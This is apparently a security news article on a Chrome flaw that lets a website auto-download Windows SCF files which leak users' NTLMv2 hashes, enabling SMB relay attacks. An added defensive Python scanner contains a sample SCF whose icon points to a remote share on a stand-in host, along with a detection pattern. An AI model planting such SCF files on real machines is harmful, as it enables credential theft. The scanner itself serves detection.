A vulnerability in Google's Chrome browser allows attackers to automatically download a malicious file onto a victim's PC that can then be used to steal credentials and launch SMB relay attacks.
Bosko Stankovic, information security engineer at DefenseCode, found the flaw in the default configuration of the latest version of Chrome running on an up-to-date version of Microsoft's Windows 10 operating system.
"Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his website to be able to proceed and reuse the victim's authentication credentials," he wrote Monday in a description of the vulnerability.
The technique allows an attacker to obtain a victim's username and Microsoft LAN Manager (NTLMv2) password hash. That leaves victims open to a number of attacks, including a Server Message Block (SMB) relay attack. An SMB relay attack allows an adversary to use a victim's credentials to authenticate to a computer or network resource such as email or a remote server.
Attackers could also use this vulnerability to attempt to crack the target's hashed password.
DefenseCode said it did not notify Google of the vulnerability. When Threatpost asked Google to comment, a spokesperson said "We're aware of this and taking the necessary actions." Google did not elaborate.
According to Stankovic, the browser attack is simple.
First, a victim is enticed to click on a specially crafted link that triggers an automatic download of a Windows Explorer Shell Command File, or SCF file (.scf), onto the victim's computer. The file is automatically downloaded to the target's C:\Users\%Username%\Downloads folder.
Once the .SCF file is downloaded into the download directory it lies dormant. However, as soon as the user opens the download folder in Windows Explorer, the SCF file attempts to retrieve information associated with a Windows icon located on the attacker's server.
When the SCF file attempts to retrieve the remote icon file information, it presents the attacker's server with the victim's username and a hashed version of the victim's password. If the victim is part of a corporate network, the username and password are the network username and password assigned to the victim by the company's system administrator. If the victim is a home user, the SCF file will request the icon data using the home user's Windows username and password.
Researchers independent of DefenseCode point out that the vulnerability isn't entirely tied to the way the Chrome browser handles SCF files, but also to the way Windows handles them.
According to Stankovic, SCF files are a lesser-known file type going back as far as Windows 98, where they were primarily used as a "Show Desktop" shortcut. "It is essentially a text file with sections that identify a command to be run (limited to running Explorer and toggling the desktop) and an icon file location," Stankovic said.
Researchers say this type of attack could be used maliciously to attempt to crack the hashed password. The attacker could also use the credential request in an SMB relay attack. Under that scenario an attacker could forward the credential request to try to access NTLM-enabled services on a corporate network, such as email or network access.
"Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as the authentication method may also be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password," Stankovic said.
To protect against the attack in Google Chrome, DefenseCode recommends visiting Settings > Show advanced settings > and checking the "Ask where to save each file before downloading" option.
"As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what's the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet, but does not give the same treatment to SCF files," Stankovic wrote in his report.
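The SCF structure Stankovic describes (a text file with a command section and an icon location) is what a defender can check for: an .scf file in a downloads folder whose icon location points at a network host is the pattern worth flagging. The following script is an added example, not code from DefenseCode or the article; the sample SCF contents and the hostname `icons.remote.example` are constructed for the demonstration.

```python
import configparser
import re
from pathlib import Path

# Constructed sample, not a file from the article: a [Shell] section with the
# toggle-desktop command and an icon location that resolves to a remote share.
SAMPLE_SCF = """[Shell]
Command=2
IconFile=\\\\icons.remote.example\\share\\icon.ico
[Taskbar]
Command=ToggleDesktop
"""

# Constructed benign SCF whose icon comes from a local system binary.
BENIGN_SCF = """[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop
"""

# Icon locations that make Explorer reach out over the network when the
# file is displayed: UNC paths (\\host\share\...), forward-slash UNC, file: URLs.
REMOTE_ICON = re.compile(r"^\s*(\\\\[^\\]+\\|//[^/]+/|file:)", re.IGNORECASE)


def icon_locations(scf_text):
    """Return every IconFile value in the SCF text, whichever section holds it."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(scf_text)
    return [sec.get("iconfile") for sec in parser.values() if sec.get("iconfile")]


def is_remote_icon(location):
    """True if an IconFile value points at a network location."""
    return bool(REMOTE_ICON.match(location))


def suspicious_scf(scf_text):
    """Return the remote icon locations found in the SCF text ([] if none)."""
    return [loc for loc in icon_locations(scf_text) if is_remote_icon(loc)]


def scan_downloads(directory):
    """Map each .scf file under `directory` (e.g. the Downloads folder) to its remote icons."""
    hits = {}
    for path in Path(directory).glob("*.scf"):
        try:
            found = suspicious_scf(path.read_text(errors="replace"))
        except configparser.Error:
            found = ["<unparseable SCF>"]  # malformed files are worth a look too
        if found:
            hits[str(path)] = found
    return hits
```

Running `scan_downloads` over a user's Downloads folder before the folder is opened in Explorer lists any SCF whose icon would trigger an outbound SMB authentication attempt.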
Stankovic said competing browsers Microsoft Internet Explorer, Edge, Mozilla Firefox and Apple Safari each do not allow the automatic download of SCF files.